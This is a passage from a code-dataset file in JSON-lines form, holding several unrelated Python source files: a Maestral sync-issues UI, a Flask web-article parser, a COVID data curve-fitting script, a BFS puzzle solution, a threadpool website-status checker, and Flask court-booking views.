json_ = {}\n        json_['data_location'] = self.grid.infer_location(self.variables[0].data)\n        return json_\n\n    @property\n    def extrapolation_is_allowed(self):\n        if self.time is not None:\n            return self.time.min_time == 
self.time.max_time or self._extrapolation_is_allowed\n        else:\n            return self._extrapolation_is_allowed\n\n    @extrapolation_is_allowed.setter\n    def extrapolation_is_allowed(self, e):\n        self._extrapolation_is_allowed = e\n\n    @property\n    def data_start(self):\n        if self.time.min_time == self.time.max_time or self.extrapolation_is_allowed:\n            return InfDateTime(\"-inf\")\n        else:\n            return self.time.min_time.replace(tzinfo=None)\n\n    @property\n    def data_stop(self):\n        if self.time.min_time == self.time.max_time or self.extrapolation_is_allowed:\n            return InfDateTime(\"inf\")\n        else:\n            return self.time.max_time.replace(tzinfo=None)\n","sub_path":"py_gnome/gnome/environment/gridded_objects_base.py","file_name":"gridded_objects_base.py","file_ext":"py","file_size_in_byte":16545,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
{"seq_id":"220677742","text":"# -*- coding: utf-8 -*-\n\n# system imports\nimport os.path as osp\nimport asyncio\nimport urllib.parse\nfrom typing import List, Any\n\n# external imports\nimport toga\nfrom toga.style.pack import Pack\nfrom toga.constants import ROW, COLUMN\nfrom maestral.daemon import MaestralProxy\n\n# local imports\nfrom .private.widgets import Label, FollowLinkButton, Icon, Window\nfrom .private.constants import WORD_WRAP\n\n\nPADDING = 10\nICON_SIZE = 48\nWINDOW_SIZE = (370, 400)\n\n\nclass SyncIssueView(toga.Box):\n\n    dbx_address = \"https://www.dropbox.com/preview\"\n\n    def __init__(self, sync_err: dict) -> None:\n        super().__init__(style=Pack(direction=COLUMN))\n\n        self.sync_err = sync_err\n        dbx_address = self.dbx_address + urllib.parse.quote(self.sync_err[\"dbx_path\"])\n\n        icon = Icon(for_path=self.sync_err[\"local_path\"])\n        # noinspection PyTypeChecker\n        image_view = toga.ImageView(\n            image=icon,\n            style=Pack(\n                width=ICON_SIZE,\n                height=ICON_SIZE,\n                padding=(0, 12, 0, 3),\n            ),\n        )\n\n        path_label = Label(\n            osp.basename(self.sync_err[\"local_path\"]),\n            style=Pack(\n                padding_bottom=PADDING / 2,\n            ),\n        )\n        error_label = Label(\n            self.sync_err[\"title\"] + \":\\n\" + self.sync_err[\"message\"],\n            linebreak_mode=WORD_WRAP,\n            style=Pack(\n                font_size=11,\n                width=WINDOW_SIZE[0] - 4 * PADDING - 15 - ICON_SIZE,\n                padding_bottom=PADDING / 2,\n            ),\n        )\n\n        link_local = FollowLinkButton(\n            \"Show in Finder\",\n            url=self.sync_err[\"local_path\"],\n            enabled=osp.exists(self.sync_err[\"local_path\"]),\n            locate=True,\n            style=Pack(\n                padding_right=PADDING,\n                font_size=11,\n                height=12,\n            ),\n        )\n        link_dbx = FollowLinkButton(\n            \"Show Online\",\n            url=dbx_address,\n            style=Pack(font_size=11, height=12),\n        )\n\n        link_box = toga.Box(\n            children=[link_local, link_dbx],\n            style=Pack(direction=ROW),\n        )\n        info_box = toga.Box(\n            children=[path_label, error_label, link_box],\n            style=Pack(direction=COLUMN, flex=1),\n        )\n        content_box = toga.Box(\n            children=[image_view, info_box],\n            style=Pack(direction=ROW),\n        )\n\n        hline = toga.Divider(style=Pack(padding=(PADDING, 0, PADDING, 0)))\n\n        self.add(content_box, hline)\n\n\nclass SyncIssuesWindow(Window):\n    def __init__(self, mdbx: MaestralProxy, app: toga.App) -> None:\n        super().__init__(title=\"Maestral Sync Issues\", release_on_close=False, app=app)\n        self.on_close = self.on_close_pressed\n\n        self.mdbx = mdbx\n        self._cached_errors: List[dict] = []\n\n        self._refresh = False\n        self._refresh_interval = 1\n\n        self.size = WINDOW_SIZE\n\n        placeholder_label = Label(\n            \"No sync issues 😊\",\n            style=Pack(padding_bottom=PADDING),\n        )\n\n        self.sync_errors_box = toga.Box(\n            children=[placeholder_label],\n            
style=Pack(\n direction=COLUMN,\n padding=2 * PADDING,\n ),\n )\n self.scroll_container = toga.ScrollContainer(\n content=self.sync_errors_box,\n horizontal=False,\n )\n\n self.content = self.scroll_container\n self.center()\n\n self.refresh_gui()\n\n async def periodic_refresh_gui(self, sender: Any = None) -> None:\n\n while self._refresh:\n self.refresh_gui()\n await asyncio.sleep(self._refresh_interval)\n\n def refresh_gui(self) -> None:\n\n new_errors = self.mdbx.sync_errors\n\n if new_errors != self._cached_errors:\n\n # remove old errors\n for child in self.sync_errors_box.children.copy():\n self.sync_errors_box.remove(child)\n\n # add new errors\n if len(new_errors) == 0:\n placeholder_label = Label(\n \"No sync issues 😊\",\n style=Pack(padding_bottom=PADDING),\n )\n self.sync_errors_box.add(placeholder_label)\n else:\n for e in new_errors:\n self.sync_errors_box.add(SyncIssueView(e))\n\n self._cached_errors = new_errors\n\n def on_close_pressed(self, sender: Any = None) -> bool:\n self._refresh = False\n return True\n\n def show(self) -> None:\n self._refresh = True\n self.app.add_background_task(self.periodic_refresh_gui)\n super().show()\n","sub_path":"src/maestral_cocoa/syncissues.py","file_name":"syncissues.py","file_ext":"py","file_size_in_byte":4733,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"351932397","text":"from __future__ import print_function # In python 2.7\nfrom werkzeug.exceptions import NotFound, ServiceUnavailable\n#from services import root_dir, nice_json\nfrom flask import Flask, request, jsonify\n\nfrom pymongo import MongoClient\nfrom bs4 import BeautifulSoup\nfrom datetime import datetime\nfrom urlparse import urlparse\nfrom urllib2 import Request\nimport nltk\nimport sys\n#import requests\nimport urllib2\nimport json\nimport re\n\napp = Flask(__name__)\n\nclient = MongoClient()\ndb = client.researchify\n\n@app.route(\"/parse\", methods=['POST'])\ndef parse():\n\turl = request.get_json(force=True)[\"url\"]\n\tparsed_uri = urlparse( 'http://stackoverflow.com/questions/1234567/blah-blah-blah-blah' )\n\tdomain = '{uri.scheme}://{uri.netloc}/'.format(uri=parsed_uri)\n\n\treq = urllib2.Request(url, headers={'User-Agent': 'Mozilla/5.0'})\n\thtml = urllib2.urlopen(req).read()\n\tsoup = BeautifulSoup(html)\n\n\t# Get title from h1\n\ttitle = soup.find(\"title\").get_text()\n\ttitle = re.sub(r'\\W+', ' ', title)\n\n\t# Get page content\n\tcontent = soup.find(\"body\")\n\n\tif content.find(\"main\"):\n\t\tcontent = content.find(\"main\")\n\n\tif content.find(\"article\"):\n\t\tcontent = content.find(\"article\")\n\n\t# Find author BEFORE it's blacklisted.\n\tauthor = find_author(content, ['div', 'p', 'span', 'a', 'ul', 'li'])\n\n\t# Remove tags\n\tblacklist_tags = [\"script\", \"style\", \"noscript\", \"form\", \"aside\", \"nav\", \"footer\", \"h1\", \"svg\", \"header\", \"input\", \"textarea\", \"button\", \"canvas\", \"iframe\"]\n\tfor tag in content.findAll(blacklist_tags):\n\t\ttag.extract()\n\n\tblacklist_names_substrings = ['share', 'more', 'btn', 'sidebar', 'social', 'connect', 'widget', 'next', 'comment', 'topbar', 'nav', 'footer', 'hidden', 'share', 'author']\n\tfor tag in content.findAll(['a', 'section', 'div', 'ul', 'li', 'span']):\n\t\tif tag.get(\"class\"):\n\t\t\tfor className in tag.get(\"class\"):\n\t\t\t\tfor name in blacklist_names_substrings:\n\t\t\t\t\tif name in className:\n\t\t\t\t\t\ttag.extract()\n\t\tif tag.get(\"id\"):\n\t\t\tfor idName in blacklist_names_substrings:\n\t\t\t\tif 
idName in tag.get(\"id\"):\n\t\t\t\t\ttag.extract()\n\t\tif tag.get(\"style\"):\n\t\t\tif 'display:none' in tag.get(\"style\") or 'display: none' in tag.get('style'):\n\t\t\t\ttag.extract()\n\n\t\t#if \"author\" in tag.get(\"class\"):\n\t\t#\tauthor = find_author(tag.text())\n\n\tchange_img_ratio(content)\n\n\t#remove_attrs(content, ['section', 'div'])\n\n\t# remove_attrs(content, 'div')\n\t# Add data to database\n\tif not author:\n\t\tauthor = \"Unknown Author\"\n\n\tprint(author, file=sys.stderr)\n\tresult = db.articles.insert_one({\n\t\t\"url\": url,\n\t\t\"title\": title,\n\t\t\"content\": str(content),\n\t\t\"author\": author\n\t})\n\n\treturn \"Got it.\"\n\n\ndef find_author(soup, tags):\n\tfor tag in soup.findAll(tags):\n\t\tif tag.get(\"class\"):\n\t\t\tfor className in tag.get(\"class\"):\n\t\t\t\tif 'author' in className:\n\t\t\t\t\t# Add random text in front of name for parser to work correctly. I think it could be an inherent issue with nameparser, not with the scraping.\n\t\t\t\t\tauthor = mine_author(\"By \" + tag.getText())\n\t\t\t\t\tif author:\n\t\t\t\t\t\treturn author\n\ndef mine_author(text):\n\tif not text:\n\t\treturn\n\n\tst = StanfordNERTagger('stanford-ner/english.all.3class.distsim.crf.ser.gz', 'stanford-ner/stanford-ner.jar')\n\ttokens = nltk.tokenize.word_tokenize(text)\n\tpos = nltk.pos_tag(tokens)\n\tsentt = nltk.ne_chunk(pos, binary = False)\n\tperson_list = []\n\tperson = []\n\tname = \"\"\n\tfor subtree in sentt.subtrees(filter=lambda t: t.label() == 'PERSON'):\n\t\tfor leaf in subtree.leaves():\n\t\t\tperson.append(leaf[0])\n\t\tif len(person) > 0: #avoid grabbing lone surnames\n\t\t\tfor part in person:\n\t\t\t\tname += part + ' '\n\t\t\tif name[:-1] not in person_list:\n\t\t\t\tperson_list.append(name[:-1])\n\t\t\tname = ''\n\t\tperson = []\n\n\t#print(person_list, file=sys.stderr)\n\tif not person_list:\n\t\treturn False\n\n\treturn \", \".join(person_list)\n\ndef removeTag(soup, tagname):\n\tfor tag in soup.findAll(tagname):\n\t\ttag.extract()\n\ndef removeClass(soup, tagname, className):\n\tfor tag in soup.findAll(tagname, className):\n\t\ttag.extract()\n\ndef removeId(soup, tagname, idName):\n\tfor tag in soup.findAll(tagname, id=idName):\n\t\ttag.extract()\n\ndef remove_attrs(soup, tag):\n for tag in soup.findAll(tag):\n tag.attrs = {}\n return soup\n\ndef removeClassTypes(tag):\n\tfor tag in content.findAll('a'):\n\t\tfor className in tag['class']:\n\t\t\tif 'btn' in className:\n\t\t\t\ttag.extract()\n\n\tfor tag in content.findAll('span'):\n\t\tfor className in tag['class']:\n\t\t\tif 'btn' in className:\n\t\t\t\ttag.extract()\n\ndef change_img_ratio(soup):\n\tfor img in soup.findAll('img'):\n\t\t#src = img['src']\n\t\t#img.attrs = {}\n\t\t#img.attrs['src'] = src\n\t\timg.attrs['height'] = 'auto'\n\t\timg.attrs['width'] = '100%'\n\treturn soup\n\nif __name__ == \"__main__\":\n app.run(port=5000, debug=True)\n","sub_path":"services/parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":4598,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"516978853","text":"from onem2m import AE\n\ncli = AE.ClientLib()\n\njson = {}\njson['ADN.ID'] = 'S0.2.481.2.100.0.41.43_AE_test001'\njson['ADN.NAME'] = 'Multisensor Device'\njson['CHECK.URI'] = 'S0.2.481.2.100.0.41.43_AE_test001'\nresult = cli.checkDuplicated(json)\nif result == 404:\n result = cli.createADN(json)\n print('> Result - create ADN: ', result)\nelif result == 200:\n print('> Result - already registered ADN: ', result)\nelse:\n 
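# The branches above map onem2m status codes to log messages by hand. A\n    # table-driven sketch of the same idea; the helper is illustrative and is\n    # not called anywhere in this script.\n    def describeResult(code):\n        outcomes = {404: 'not registered yet - safe to create',\n                    200: 'already registered ADN'}\n        return outcomes.get(code, 'internal server error')\n\n    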
print('> Result - Internal server error: ', result)\n\n","sub_path":"temp.py","file_name":"temp.py","file_ext":"py","file_size_in_byte":475,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
{"seq_id":"460605840","text":"import datetime\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport xlrd\nimport time\n\n# Specifies which files we fetch data from\n\nlocD = \"excel/data.xls\"\n\nwbD = xlrd.open_workbook(locD)\nsheetD = wbD.sheet_by_index(0)\nsheetD.cell_value(0, 0)\n\ndays = []\ninnlagt = []\ndeaths = []\n\n\n# ----------- Methods that fetch data from the Excel sheet START------------\ndef getDate(c, day, sheet):\n    dayvalue = sheet.cell_value(day, c)\n    y = dayvalue.split(\"T\")\n    x = y[0].split(\"-\")\n    date = datetime.date(int(x[0]), int(x[1]), int(x[2]))\n    date_time = date.strftime('%d/%m/%Y')\n    return date_time\n\n\n# Method that fetches data from each cell in the Excel sheet\ndef getNum(i, c, sheet):\n    positiv = int(sheet.cell_value(i, c))\n    return positiv\n\n\n# Method that puts the data into lists used to interpolate D(t) and K(t)\ndef getNumbers(sheet, column, array, startrad, sluttrad):\n    for i in range(sheet.nrows):\n        if i < startrad:\n            continue\n        elif i <= sluttrad:\n            array.append(int(getNum(i, column, sheet)))\n\n\n# Method that fetches hospitalizations from the Excel data within the specified period\ndef getInnlagt(startrad, sluttrad):\n    getNumbers(sheetD, 2, innlagt, startrad, sluttrad)\n\n\n# Method that fetches deaths from the Excel data within the specified period\ndef getDeaths(startrad, sluttrad):\n    getNumbers(sheetD, 1, deaths, startrad, sluttrad)\n\n\n# Method that fetches the day numbers from the Excel data within the specified period\ndef getDays(startrad, sluttrad):\n    for i in range(sheetD.nrows):\n        if i < startrad:\n            continue\n        elif i <= sluttrad:\n            days.append(i)\n\n\n# ----------- Methods that fetch data from the Excel sheet END------------\n\n\n# Method that interpolates the death data into a continuous function\ndef D(t):\n    return np.interp(np.array(t), days, deaths)\n\n\n# Method that interpolates the hospitalization data into a continuous function\ndef K(t):\n    return np.interp(np.array(t), days, innlagt)\n\n\n# Method that sets up the function C(k, d)\ndef CFunction(vektor, k, d, T):\n    kVektor = k * K(vektor - d)\n    dVektor = D(vektor)\n    return (np.trapz((kVektor - dVektor) ** 2, vektor)) / (T - d)\n\n\ndef plotCostFunction(vektor, periode, iterasjoner, start, slutt):\n    # Vectors of parameter values\n    global dMin, kMin\n    n = 100\n    kRange = np.array(np.linspace(0, 0.05, n))\n    dRange = np.array(np.linspace(0, 60, n))\n    iter = 0\n\n    # Find the smallest value of C over k and d\n    CMin = 1000000\n    for k in kRange:\n        for d in dRange:\n            C = CFunction(vektor, k, d,\n                          periode)  # Call the C function, which computes any new minimum C values\n            if C < CMin:  # If the function yields a lower C, set C, k and d to the new values\n                CMin = C\n                kMin = k\n                dMin = d\n                print(\"k: \" + str(kMin) + \"\\td: \" + str(dMin) + \"\\tCMin: \" + str(\n                    CMin))  # Print the new values to the terminal\n            iter = iter + 1\n\n    print(\"Done!\")\n\n\n    plotvektor = np.array(np.linspace(dMin, periode, iterasjoner))\n    # Plot D(t)\n    plt.plot(plotvektor, D(plotvektor))\n    # Plot k*K(t-d)\n    plt.plot(plotvektor, kMin * K(plotvektor - dMin))\n\n    print(\"The k value that gives the smallest C(k,d) is \" + str(kMin))\n    print(\"The d value that gives the smallest C(k,d) is \" + str(dMin))\n    plt.title(\"k = \" + str(kMin) + \"\\nd = \" + str(dMin) + \"\\nCMin = \" + str(CMin))\n    
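# The double loop above calls CFunction once per (k, d) pair. A vectorized\n    # sketch of the same search, computing one row of costs per d; the helper\n    # name is illustrative and it is not called here.\n    def vectorizedGridSearch(vektor, periode, kRange, dRange):\n        rows = [np.trapz((np.outer(kRange, K(vektor - d)) - D(vektor)) ** 2,\n                         vektor, axis=1) / (periode - d)\n                for d in dRange]\n        costs = np.array(rows)  # shape: (len(dRange), len(kRange))\n        dIdx, kIdx = np.unravel_index(np.argmin(costs), costs.shape)\n        return kRange[kIdx], dRange[dIdx], costs[dIdx, kIdx]\n\n    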
plt.legend(['D(t)', 'k*K(t-d)'])\n    plt.tight_layout()\n    plt.show()\n    print(\"iterations: \"+str(iter))\n\n\nif __name__ == \"__main__\":\n    start_time = time.time()\n    # Set which day we want the period to start from\n    start = 0\n\n    # Set which day we want the period to end on\n    slutt = 393\n\n    # Set how many days of data are considered\n    periode = slutt - start + 1\n\n    # Set how many iterations I want for the time span being considered\n    iterasjoner = periode * 24\n\n    # Create a vector from the parameters defined above\n    vektor = np.array(np.linspace(0, periode, iterasjoner))\n\n    # Fetch the day numbers from the Excel sheet and put them in an array\n    getDays(0, 393)\n\n    # Fetch the (cumulative) number of hospitalizations from the Excel sheet and put it in an array\n    getInnlagt(0, 393)\n\n    # Fetch the (cumulative) number of deaths from the Excel sheet and put it in an array\n    getDeaths(0, 393)\n\n    # Start the computation and the plotting of the data\n    plotCostFunction(vektor, periode, iterasjoner, start, slutt)\n\n    print(\"-------- %s seconds --------\" % (time.time()-start_time))\n","sub_path":"Henrik/unused/bruteforceSolve.py","file_name":"bruteforceSolve.py","file_ext":"py","file_size_in_byte":4612,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
{"seq_id":"326638466","text":"import sys\nsys.stdin=open(\"input.txt\",\"r\")\nfrom collections import deque\n\ndef bfs():\n    while(q):\n        a,b=q.popleft()\n        visited[a]=True\n        if a==m:\n            print(b)\n            break\n\n        # add the three possible moves\n        if a+1<=100000 and visited[a+1]==False:\n            q.append([a+1,b+1])\n        if a-1>=0 and visited[a-1]==False:\n            q.append([a-1,b+1])\n        if 2*a<=100000 and visited[a*2]==False:\n            q.append([2*a,b+1])\n    \n\nn,m=map(int,input().split())\n\nvisited=[False for _ in range(100001)]\nq=deque()\nq.append([n,0]) # store the initial position and move count\nif n>=m:\n    print(n-m)\nelse:\n    bfs()\n\n","sub_path":"practice/1697(bfs).py","file_name":"1697(bfs).py","file_ext":"py","file_size_in_byte":653,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
{"seq_id":"227619534","text":"from matcher import *\r\nimport os\r\n\r\nclass inputParser:\r\n    @staticmethod\r\n    def prefixSeparator(splittedText):\r\n        i = 0\r\n        while(i < len(splittedText)):\r\n            temp = splittedText[i]\r\n            wordLength = len(temp)\r\n            j, needSplit = 0, False\r\n            while(j < wordLength and not temp[j].isalpha()):\r\n                j, needSplit = j + 1, True\r\n            if(j < wordLength and needSplit):\r\n                del splittedText[i]\r\n                splittedText.insert(i, temp[0:j])\r\n                splittedText.insert(i + 1, \"<=>\")\r\n                splittedText.insert(i + 2, temp[j:wordLength])\r\n                i += 3\r\n            else:\r\n                i += 1\r\n        return splittedText\r\n    \r\n    @staticmethod\r\n    def suffixSeparator(splittedText):\r\n        # specialChar = ['.', ',', '!', '?',')', '(', \"'\", \"\\\"\",\\\r\n        #               '{', '}', '[', ']', '@', '&']\r\n        i = 0\r\n        while(i < len(splittedText)):\r\n            temp = splittedText[i]\r\n            wordLength = len(temp)\r\n            j, needSplit = wordLength - 1, False\r\n            while(j >= 0 and not temp[j].isalpha()):\r\n                j, needSplit = j - 1, True\r\n            if(j >= 0 and needSplit):\r\n                del splittedText[i]\r\n                splittedText.insert(i, temp[0:j + 1])\r\n                splittedText.insert(i + 1, \"<=>\")\r\n                splittedText.insert(i + 2, temp[j + 1:wordLength])\r\n                i += 3\r\n            else:\r\n                i += 1\r\n        return splittedText\r\n    \r\n    @staticmethod\r\n    def decode(text):\r\n        decodedText, i, textLength = \"\", 0, len(text)\r\n        while(i < textLength):\r\n            decodedText += text[i]\r\n            if i != textLength - 1 and text[i + 1] != \"<=>\":\r\n                decodedText += \" \"\r\n                i 
+= 1\r\n            else:\r\n                i += 2\r\n        return decodedText\r\n\r\n    @staticmethod\r\n    def deleteEncoding(text):\r\n        return [word for word in text if word != \"<=>\"]\r\n\r\nclass LibParser:\r\n    class Entry:\r\n        def __init__(self, entry):\r\n            entry = entry.split(' = ')\r\n            self.key = entry[0]\r\n            self.data = entry[1]\r\n            self.keyLength = len(entry[0].split(\" \"))\r\n\r\n    def __init__(self, indo=\"../data/indonesia.txt\", sunda=\"../data/sunda.txt\",\\\r\n        removedWordsSunda = [\"teh\"], removedWordsIndo = []):\r\n        if not os.path.isfile(indo) or not os.path.isfile(sunda):\r\n            print('File does not exist.')\r\n            exit(1)\r\n        else:\r\n            with open(indo) as i:\r\n                self.vocabIndo = i.read().splitlines()\r\n            self.removedWordsIndo = removedWordsIndo\r\n            temp = []\r\n            for i in self.vocabIndo:\r\n                temp.append(LibParser.Entry(i))\r\n            self.vocabIndo = sorted(temp, key = lambda x : x.keyLength, reverse = True)\r\n\r\n            with open(sunda) as s:\r\n                self.vocabSunda = s.read().splitlines()\r\n            self.removedWordsSunda = removedWordsSunda\r\n            temp = []\r\n            for i in self.vocabSunda:\r\n                temp.append(LibParser.Entry(i))\r\n            self.vocabSunda = sorted(temp, key = lambda x : x.keyLength, reverse = True)\r\n\r\nif __name__=='__main__':\r\n    p = LibParser()\r\n    for i in p.vocabIndo:\r\n        print(i.keyLength)\r\n\r\n","sub_path":"src/stringParser.py","file_name":"stringParser.py","file_ext":"py","file_size_in_byte":3389,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
{"seq_id":"583378406","text":"\"\"\"Threadpools are an easy and convenient way to run in threads\"\"\"\nimport concurrent.futures\nimport requests\nimport time\nfrom pathlib import Path\nimport threading\n\nSTATUS_REPORT = Path(\"status_report.txt\")\nSTATUS_REPORT.write_text(\"\")\nREPORT_LOCK = threading.Lock()\n\ndef get_status(url):\n    print(f\"Getting status of {url}\")\n    start_time = time.monotonic()\n    response = requests.get(url)\n    total_time = time.monotonic() - start_time\n    print(f\"Finished getting status of {url} in {total_time:.2f} seconds\")\n    with REPORT_LOCK:\n        current_text = STATUS_REPORT.read_text()\n        STATUS_REPORT.write_text(f\"{current_text}{url}: {response.status_code}\\n\")\n    return url, response.status_code\n\nurls = [\n    \"https://www.google.com\",\n    \"https://www.facebook.com\",\n    \"https://www.twitter.com\",\n    \"https://www.github.com\",\n    \"https://www.linkedin.com\"\n]\n\nwith concurrent.futures.ThreadPoolExecutor(max_workers=5) as executor:\n    futures = []\n    for url in urls:\n        future = executor.submit(get_status, url)\n        futures.append(future)\n\n    for future in concurrent.futures.as_completed(futures):\n        try:\n            url, code = future.result()\n            print(f\"Status code for {url} is {code}\")\n        except Exception as err:\n            print(f\"Task failed! 
{err}\")\n","sub_path":"Python/threading/site_status.py","file_name":"site_status.py","file_ext":"py","file_size_in_byte":1305,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
{"seq_id":"537884049","text":"\"\"\"\nViews for slots\n\"\"\"\n\nimport cala.auth\n\nfrom flask import redirect, url_for, render_template, request, flash\nfrom sqlalchemy.exc import IntegrityError\n\nfrom cala.database import db_session\nfrom cala.decorators import requires_role\nfrom cala.models import Court, Slot, User, BookedSlot\nfrom ..cala import app\n\n\n@app.route('/slots')\n@requires_role('admin')\ndef list_slots():\n    all_slots = Slot.query.join(Court).order_by(Court.name).\\\n        order_by(Slot.weekday).order_by(Slot.time_start).\\\n        all()\n    slots = {}\n    for elem in all_slots:\n        if elem.court.name not in slots:\n            slots[elem.court.name] = []\n        slots[elem.court.name].append(elem)\n    return render_template('slots/list.html', court_names=sorted(slots.keys()), slots=slots)\n\n\n@app.route('/slots/add', methods=['GET', 'POST'])\n@requires_role('admin')\ndef add_slot():\n    if request.method == 'GET':\n        courts = Court.query.order_by(Court.name).all()\n        return render_template('slots/add.html', courts=courts)\n    if request.method == 'POST':\n        court_id = request.form.get('court_id', None)\n        court = Court.query.get(court_id)\n        weekday = request.form.get('weekday', None)\n        time_start = request.form.get('time_start', None)\n        time_end = request.form.get('time_end', None)\n        slot = Slot(court=court,\n                    weekday=weekday,\n                    time_start=time_start,\n                    time_end=time_end)\n        db_session.add(slot)\n        try:\n            db_session.commit()\n        except IntegrityError:\n            error = 'Slot could not be added'\n            db_session.rollback()\n            return render_template('slots/add.html',\n                                   error=error,\n                                   court_id=court_id,\n                                   weekday=weekday,\n                                   time_start=time_start,\n                                   time_end=time_end)\n        flash(\"Slot '%s' has been added\" % str(slot))\n        return redirect(url_for('list_slots'))\n\n\n@app.route('/slots/edit/<int:slot_id>', methods=['GET', 'POST'])\n@requires_role('admin')\ndef edit_slot(slot_id):\n    slot = Slot.query.get(slot_id)\n    if request.method == 'GET':\n        courts = Court.query.order_by(Court.name).all()\n        return render_template('slots/edit.html', courts=courts, slot=slot)\n    if request.method == 'POST':\n        slot.court = Court.query.get(request.form.get('court_id', None))\n        slot.weekday = request.form.get('weekday', None)\n        slot.time_start = request.form.get('time_start', None)\n        slot.time_end = request.form.get('time_end', None)\n        try:\n            db_session.commit()\n        except IntegrityError:\n            error = \"Could not save changes\"\n            db_session.rollback()\n            return render_template('slots/edit.html',\n                                   error=error,\n                                   slot=slot)\n        flash(\"Slot '%s' has been saved\" % str(slot))\n        return redirect(url_for('list_slots'))\n\n\n@app.route('/slots/delete/<int:slot_id>', methods=['GET', 'POST'])\n@requires_role('admin')\ndef delete_slot(slot_id):\n    slot = Slot.query.get(slot_id)\n    if request.method == 'GET':\n        return render_template('slots/delete.html', slot=slot)\n    if request.method == 'POST':\n        slot_label = str(slot) # after deleting we could otherwise not do str(slot)\n        if request.form.get('confirm_delete', None) != 'yes':\n            error = 'Confirmation required to prevent accidental deletion'\n            return render_template('slots/delete.html',\n                                   error=error,\n                                   slot=slot)\n        db_session.delete(slot)\n        try:\n            db_session.commit()\n        except IntegrityError:\n            error = \"Could not delete slot '%s'\" % slot_label\n            db_session.rollback()\n            return render_template('slots/delete.html',\n                                   error=error,\n                                   slot=slot)\n        flash(\"Slot '%s' has been 
deleted\" % slot_label)\n return redirect(url_for('list_slots'))\n\n\n@app.route('/slots/book/<int:slot_id>/<string:date_str>', methods=['GET', 'POST'])\n@requires_role('user')\ndef book_slot(slot_id, date_str):\n if date_str < cala.time.format_date():\n flash('The date you tried to book is in the past')\n return redirect(url_for('show_week', start_date=cala.time.first_of_week(date_str)))\n\n slot = Slot.query.get(slot_id)\n booked_slot = BookedSlot.query.filter_by(slot_id=slot_id).\\\n filter_by(booked_date=date_str).first()\n if booked_slot is not None:\n flash('Slot already booked by %s' % booked_slot.booked_by_user.email)\n return redirect(url_for('show_week', start_date=date_str))\n current_user = cala.auth.get_user()\n if request.method == 'GET':\n users = User.query.order_by(User.name).order_by(User.email).all()\n return render_template('slots/book.html',\n date_str=date_str,\n slot=slot,\n booked_slot=booked_slot,\n users=users,\n current_user=current_user)\n if request.method == 'POST':\n players = [User.query.get(request.form.get('player_1_id', None)),\n User.query.get(request.form.get('player_2_id', None)),\n User.query.get(request.form.get('player_3_id', None)),\n User.query.get(request.form.get('player_4_id', None))]\n booked_slot = cala.businesslogic.book_slot(slot, date_str, players)\n db_session.add(booked_slot)\n try:\n db_session.commit()\n except:\n error = \"Could not book slot\"\n db_session.rollback()\n return render_template('slots/book.html',\n error=error,\n date_str=date_str,\n slot=slot,\n booked_slot=booked_slot,\n users=users,\n current_user=current_user)\n flash(\"Booked '%s' on %s (%s - %s)\" % (slot.court.name,\n date_str,\n slot.time_start,\n slot.time_end))\n return redirect(url_for('show_week', start_date=cala.time.first_of_week(date_str)))\n\n\n@app.route('/slots/booked/delete/<int:booked_slot_id>', methods=['GET', 'POST'])\n@requires_role('user', 'admin')\ndef delete_booked_slot(booked_slot_id):\n booked_slot = BookedSlot.query.get(booked_slot_id)\n if not booked_slot:\n flash('No booked slot found')\n return redirect(url_for('show_week'))\n if not cala.auth.can_user_delete_booked_slot(booked_slot):\n flash('You are not allowed to delete this booking')\n return redirect(url_for('show_week', start_date=booked_slot.booked_date))\n if request.method == 'GET':\n return render_template('slots/delete_booked_slot.html', booked_slot=booked_slot)\n if request.method == 'POST':\n the_date = booked_slot.booked_date\n if request.form.get('confirm_delete', None) != 'yes':\n error = 'Confirmation required to prevent accidental deletion'\n return render_template('slots/delete_booked_slot.html',\n error=error,\n booked_slot=booked_slot)\n db_session.delete(booked_slot)\n try:\n db_session.commit()\n except IntegrityError:\n error = \"Could not delete booking\"\n db_session.rollback()\n return render_template('slots/delete_booked_slot.html',\n error=error,\n booked_slot=booked_slot)\n flash(\"Slot booking has been deleted\")\n return redirect(url_for('show_week', start_date=the_date))\n\n\n@app.route('/slots/booked/edit/<int:booked_slot_id>', methods=['GET', 'POST'])\n@requires_role('user', 'admin')\ndef edit_booked_slot(booked_slot_id):\n booked_slot = BookedSlot.query.get(booked_slot_id)\n if not booked_slot:\n flash('No booked slot found')\n return redirect(url_for('show_week'))\n if not cala.auth.can_user_edit_booked_slot(booked_slot):\n flash('You are not allowed to edit this booking')\n return redirect(url_for('show_week', start_date=booked_slot.booked_date))\n 
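# Every POST handler in this module repeats the commit / IntegrityError /\n    # rollback sequence. A sketch of how it could be factored out; the helper\n    # is illustrative and is not used by the views below.\n    def tryCommit(session, error_message):\n        try:\n            session.commit()\n            return None\n        except IntegrityError:\n            session.rollback()\n            return error_message\n\n    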
users = User.query.order_by(User.name).order_by(User.email).all()\n    if request.method == 'GET':\n        return render_template('slots/edit_booked_slot.html', booked_slot=booked_slot, users=users)\n    if request.method == 'POST':\n        cala.businesslogic.change_players(booked_slot,\n                                          [booked_slot.player_1,\n                                           User.query.get(request.form.get('player_2_id', None)),\n                                           User.query.get(request.form.get('player_3_id', None)),\n                                           User.query.get(request.form.get('player_4_id', None))])\n        try:\n            db_session.commit()\n        except IntegrityError:\n            error = \"Could not change booking\"\n            db_session.rollback()\n            return render_template('slots/edit_booked_slot.html',\n                                   error=error,\n                                   booked_slot=booked_slot,\n                                   users=users)\n        flash(\"Slot booking has been changed\")\n        return redirect(url_for('show_week', start_date=booked_slot.booked_date))\n","sub_path":"cala/views/slots.py","file_name":"slots.py","file_ext":"py","file_size_in_byte":9719,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
